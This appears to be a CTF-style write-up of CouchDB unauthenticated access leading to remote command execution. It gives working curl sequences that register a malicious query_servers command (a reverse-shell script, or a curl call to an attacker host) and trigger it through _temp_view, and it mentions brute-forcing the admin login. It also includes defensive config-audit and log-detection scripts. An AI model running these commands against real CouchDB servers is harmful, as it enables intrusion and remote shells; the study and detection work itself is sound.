Background
CouchDB is an open source, document-oriented database management system, accessed through a RESTful JavaScript Object Notation (JSON) API. CouchDB can be installed on most POSIX systems, including Linux and Mac OS X.
Vulnerability Introduction
By default CouchDB opens its RESTful API on port 5984 (6984 if SSL is used) for managing the database. The HTTP server is enabled by default with no authentication and is bound to 0.0.0.0, so anyone who can reach the port can call the API, which results in unauthorized access.
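The exposure described above comes down to three settings in CouchDB's local.ini: no `[admins]` entry (the so-called "admin party"), `bind_address = 0.0.0.0`, and anonymous access left enabled. The audit script below is an added example, not code from the original article: it checks a local.ini for those settings and for unexpected `[query_servers]` entries (the mechanism the exploit section relies on), and compares a weak configuration with a hardened one. Section and key names follow CouchDB 1.x (`[httpd] bind_address`, `[admins]`, `[couch_httpd_auth] require_valid_user`, `[query_servers]`); the `[chttpd]` check covers the 2.x layout. Both ini texts are constructed for this example, and the admin password hash is a placeholder.

```python
"""Audit a CouchDB local.ini for the exposure described in the article.

Added example, not code from the original article.  Section/key names follow
CouchDB 1.x; the sample ini texts below are constructed for this example.
"""
import configparser

# Constructed: default-style config with no admin, bound to every interface,
# plus the extra "cmd" query server that the article's exploit adds.
WEAK_INI = """\
[httpd]
port = 5984
bind_address = 0.0.0.0

[couch_httpd_auth]
require_valid_user = false

[query_servers]
javascript = /usr/bin/couchjs /usr/share/couchdb/server/main.js
cmd = python /tmp/back.py
"""

# Constructed: the same server after hardening (placeholder password hash).
HARDENED_INI = """\
[httpd]
port = 5984
bind_address = 127.0.0.1

[admins]
admin = -pbkdf2-PLACEHOLDERHASH,PLACEHOLDERSALT,10

[couch_httpd_auth]
require_valid_user = true

[query_servers]
javascript = /usr/bin/couchjs /usr/share/couchdb/server/main.js
"""

# View-server languages CouchDB ships with; anything else deserves a look.
EXPECTED_QUERY_SERVERS = {"javascript", "coffeescript"}


def parse_ini(text):
    # interpolation=None: CouchDB values may legitimately contain '%'.
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    cp.read_string(text)
    return cp


def audit_couchdb_ini(text):
    """Return a list of (severity, finding) tuples; an empty list means no findings."""
    cp = parse_ini(text)
    findings = []

    # 1. Admin party: with no [admins] entries every client is an administrator.
    admins = dict(cp.items("admins")) if cp.has_section("admins") else {}
    if not admins:
        findings.append(("high", "no [admins] configured: server is in 'admin party' mode"))

    # 2. Listening on every interface exposes the API beyond localhost.
    for section in ("httpd", "chttpd"):
        if cp.has_section(section):
            bind = cp.get(section, "bind_address", fallback="127.0.0.1").strip()
            if bind in ("0.0.0.0", "::"):
                findings.append(("medium", f"[{section}] bind_address = {bind}: API reachable from any interface"))

    # 3. Anonymous access to non-admin endpoints still permitted.
    rvu = cp.get("couch_httpd_auth", "require_valid_user", fallback="false")
    if rvu.strip().lower() != "true":
        findings.append(("medium", "require_valid_user is not true: anonymous reads/writes permitted"))

    # 4. Extra query servers: a new language here is exactly how a config write
    #    turns into command execution, so anything beyond the defaults is high.
    if cp.has_section("query_servers"):
        for lang, cmd in cp.items("query_servers"):
            if lang not in EXPECTED_QUERY_SERVERS:
                findings.append(("high", f"unexpected query server '{lang}' -> {cmd}"))
    return findings


if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(f"== {name} ==")
        for sev, msg in audit_couchdb_ini(ini) or [("ok", "no findings")]:
            print(f"  [{sev}] {msg}")
```

Run it against a real local.ini by replacing the constructed text with the file's contents; the hardened sample shows the target state (an admin user, loopback binding or a firewall in front, `require_valid_user = true`, and only the stock query servers).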
An nmap scan will reveal the CouchDB banner information.
Executing commands requires admin privileges. If the instance allows unauthorized access, it can be exploited directly; if account authentication is enabled, you need some way to obtain the admin password, for example by brute-forcing the login at /_utils/ through Burp Suite, or with the Metasploit module auxiliary/scanner/couchdb/couchdb_login. CouchDB also provides a visual management interface that runs in the browser at "http://127.0.0.1:5984/_utils/".
Exploit
In the case shown here, account authentication is enabled, so we first log in as admin to obtain a session cookie, then use curl to interact with the API and perform the database operations.
Remote Command Execution Example
- Add a new query_servers configuration entry whose value is the command to be executed;
- Create a temporary database and a temporary document (insert one record);
- Call the query server to process the data via a temp view, which runs the configured command.
```shell
curl -X PUT 'http://192.168.199.181:5984/_config/query_servers/cmd' -d '"python /tmp/back.py"' -H "Cookie: AuthSession=YWRtaW46NTc5QTRGMjc6VKTKwNEud9fFchzR-HtOrjM5Cg4"
curl -X PUT 'http://192.168.199.181:5984/teeest' -H "Cookie: AuthSession=YWRtaW46NTc5QTRGMjc6VKTKwNEud9fFchzR-HtOrjM5Cg4"
curl -X PUT 'http://192.168.199.181:5984/teeest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}' -H "Cookie: AuthSession=YWRtaW46NTc5QTRGMjc6VKTKwNEud9fFchzR-HtOrjM5Cg4"
curl -X POST 'http://192.168.199.181:5984/teeest/_temp_view?limit=11' -d '{"language":"cmd","map":""}' -H 'Content-Type: application/json' -H "Cookie: AuthSession=YWRtaW46NTc5QTRGMjc6VKTKwNEud9fFchzR-HtOrjM5Cg4"
```
The reverse-shell script is downloaded remotely (the listener sees the download request), given execute permission and run; the reverse shell connects back and the flag can be read.
Alternatively, instead of logging in to obtain a cookie, you can put the account name and password directly into the curl request, like this. The result is the same, and this method may be somewhat more convenient.
```shell
root@Urahara:~# curl -X PUT 'admin:[email protected]:5984/_config/query_servers/cmd' -d '"curl http://192.168.199.140/flag"'
"curl http://192.168.199.140/flag"
root@Urahara:~# curl -X PUT 'admin:[email protected]:5984/wa'
{"ok":true}
root@Urahara:~# curl -X PUT 'admin:[email protected]:5984/wa/haha' -d '{"_id":"770895a97726d5ca6d70a22173005c7a"}'
{"ok":true,"id":"haha","rev":"1-967a00dff5e02add41819138abb3284d"}
root@Urahara:~# curl -X POST 'admin:[email protected]:5984/wa/_temp_view?limit=14' -d '{"language":"cmd","map":""}' -H 'Content-Type: application/json'
```
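Both sessions above leave the same trace in CouchDB's request log: a successful PUT to `/_config/query_servers/<name>` from one client, followed shortly by a POST to a `_temp_view` from the same client. The detector below is an added example, not code from the original article. It parses lines laid out like CouchDB 1.x httpd log entries (`[<date>] [info] [<pid>] <client> - - <METHOD> <path> <status>`), applies three rules (the two exact steps of the chain, plus any `/_config/` write as a broader signal), and reports clients that completed the whole chain. The log lines are constructed for this example using the article's 192.168.199.x hosts alongside benign traffic from a made-up 10.0.0.7 client.

```python
"""Detect the query_servers -> _temp_view chain in CouchDB request logs.

Added example, not code from the original article.  Log line layout is
modelled on CouchDB 1.x httpd log entries; all lines below are constructed.
"""
import re
from collections import defaultdict

# Constructed sample: the article's chain from 192.168.199.140, then normal
# application traffic from an unrelated client.
SAMPLE_LOG = """\
[Wed, 13 Jul 2016 02:03:10 GMT] [info] [<0.130.0>] 192.168.199.140 - - GET /_utils/ 200
[Wed, 13 Jul 2016 02:03:12 GMT] [info] [<0.130.0>] 192.168.199.140 - - POST /_session 200
[Wed, 13 Jul 2016 02:03:30 GMT] [info] [<0.131.0>] 192.168.199.140 - - PUT /_config/query_servers/cmd 200
[Wed, 13 Jul 2016 02:03:31 GMT] [info] [<0.131.0>] 192.168.199.140 - - PUT /teeest 201
[Wed, 13 Jul 2016 02:03:32 GMT] [info] [<0.131.0>] 192.168.199.140 - - PUT /teeest/vul 201
[Wed, 13 Jul 2016 02:03:33 GMT] [info] [<0.131.0>] 192.168.199.140 - - POST /teeest/_temp_view?limit=11 200
[Wed, 13 Jul 2016 02:05:00 GMT] [info] [<0.132.0>] 10.0.0.7 - - GET /orders/_design/report/_view/by_date 200
[Wed, 13 Jul 2016 02:05:01 GMT] [info] [<0.132.0>] 10.0.0.7 - - PUT /orders/doc-42 201
"""

LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[\w+\] \[<[^>]+>\] (?P<client>\S+) - - "
    r"(?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3})$"
)

# (rule name, predicate over a parsed request).  The first two are the exact
# steps of the article's chain; the third flags any runtime config write.
RULES = [
    ("query_server_added", lambda r: r["method"] in ("PUT", "DELETE")
        and r["path"].startswith("/_config/query_servers/")),
    ("temp_view_query", lambda r: r["method"] == "POST"
        and "/_temp_view" in r["path"]),
    ("config_write", lambda r: r["method"] in ("PUT", "DELETE")
        and r["path"].startswith("/_config/")),
]


def parse_log_line(line):
    """Return a dict with ts/client/method/path/status, or None if the line does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def detect(log_text):
    """Map each client to the list of rule names its successful (2xx) requests triggered."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        req = parse_log_line(line)
        # Only 2xx responses matter: a rejected config write never changed anything.
        if req is None or not req["status"].startswith("2"):
            continue
        for name, pred in RULES:
            if pred(req):
                hits[req["client"]].append(name)
    return dict(hits)


def escalate(hits):
    """Clients that both registered a query server and ran a temp view: the full chain."""
    return sorted(client for client, names in hits.items()
                  if "query_server_added" in names and "temp_view_query" in names)


if __name__ == "__main__":
    hits = detect(SAMPLE_LOG)
    for client, names in hits.items():
        print(f"{client}: {', '.join(names)}")
    print("full chain from:", escalate(hits) or "none")
```

A single `config_write` hit is worth a look on its own, since on a correctly run server the `/_config` endpoint should only ever be written by an administrator during maintenance; the paired `query_server_added` and `temp_view_query` hits from one client are the signature of the sessions shown above.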
Reference
- CouchDB unauthorized access vulnerability: executing arbitrary system commands
- CouchDB unauthorized access vulnerability causing the system to execute commands
- Original: Big Box Command Execution via Remote CouchDB